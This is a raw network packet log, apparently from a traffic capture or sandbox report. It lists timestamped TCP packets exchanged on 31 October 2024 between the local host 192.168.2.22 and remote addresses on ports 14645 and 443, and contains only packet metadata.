                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930088997 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930295944 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930305004 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930319071 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930341959 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930428028 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930468082 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930577040 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930588007 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930597067 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930608034 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930622101 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930634022 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930751085 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930762053 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930773020 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930785894 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930794954 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930799007 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930830002 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930895090 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930906057 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930917025 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930927038 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930938005 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.930959940 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931199074 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931210995 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931221008 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931238890 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931338072 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931351900 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931381941 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931498051 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931514978 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931524992 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931535959 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931550026 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931551933 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931566954 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931571960 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931579113 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931590080 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931600094 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931606054 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931610107 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931621075 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931624889 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931632042 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931641102 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931643963 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931663990 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931672096 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931684017 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931691885 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931699991 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931703091 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931711912 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931715012 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931727886 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931740046 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931756973 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931761980 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931762934 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931766987 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931768894 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931776047 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931786060 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931796074 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931797981 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931808949 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931819916 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931823969 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931830883 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931842089 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931845903 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931853056 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931864023 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931864977 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931884050 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931890011 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931902885 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931912899 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931922913 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931932926 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931934118 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931946039 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931956053 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931962967 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931968927 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931978941 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931988955 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931993961 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.931998968 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.932010889 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.932017088 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.932034016 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.932089090 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.932131052 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.932137966 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933554888 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933567047 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933576107 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933584929 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933594942 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933600903 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933623075 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933687925 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933698893 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933706999 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933732033 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933832884 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933841944 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933851004 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933861017 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933866978 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933871984 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933882952 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933887959 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933892965 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933903933 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933909893 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933926105 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933965921 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933975935 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933986902 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.933996916 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934004068 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934022903 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934541941 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934551954 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934561968 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934581995 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934585094 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934629917 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934637070 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934701920 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934711933 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934721947 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934731960 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934739113 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934742928 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934751987 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934781075 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934880018 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934890032 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934899092 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934907913 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934917927 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934921026 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934928894 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934938908 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934941053 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.934961081 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935034990 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935044050 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935055971 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935076952 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935173988 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935183048 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935216904 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935461998 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935472965 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935503960 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935626030 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935635090 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935645103 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935655117 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935663939 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935674906 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935679913 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935691118 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935698986 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935702085 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935705900 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935717106 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935729027 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935733080 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935739994 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935745955 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935750961 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935750961 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935758114 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935769081 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935779095 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935787916 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935791016 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935806036 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935882092 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935925961 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.935933113 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936119080 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936130047 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936162949 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936254025 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936264038 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936297894 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936394930 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936405897 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936414003 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936439037 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936543941 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936557055 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936566114 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936574936 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936580896 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936587095 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936599016 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936599970 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936609983 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936621904 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.936638117 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.937402010 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.937448025 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.937454939 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.938414097 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.938457012 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.938462973 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.939471006 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.939517021 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.939523935 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.940609932 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.940659046 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.940665960 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.940749884 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.940803051 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.940809965 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.942281008 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.942322969 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.942332983 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.943660975 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.943703890 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.943711042 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.945308924 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.945354939 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.945362091 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.947041988 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.947088957 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.947094917 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.947962046 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.948004961 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.948012114 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.948955059 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.948995113 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.949006081 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.950006962 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.950050116 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.950054884 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.951262951 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.951307058 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.951318026 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.952467918 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.952512026 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.952517986 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.953886032 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.953913927 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.953932047 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.953939915 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.953979969 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.955105066 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.955173016 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.955214024 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.955229998 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.956579924 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.956629992 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.956636906 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.957845926 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.957889080 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.957895041 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.959120035 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.959165096 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.959172010 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.960230112 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.960268974 CET49175443192.168.2.22172.217.16.193
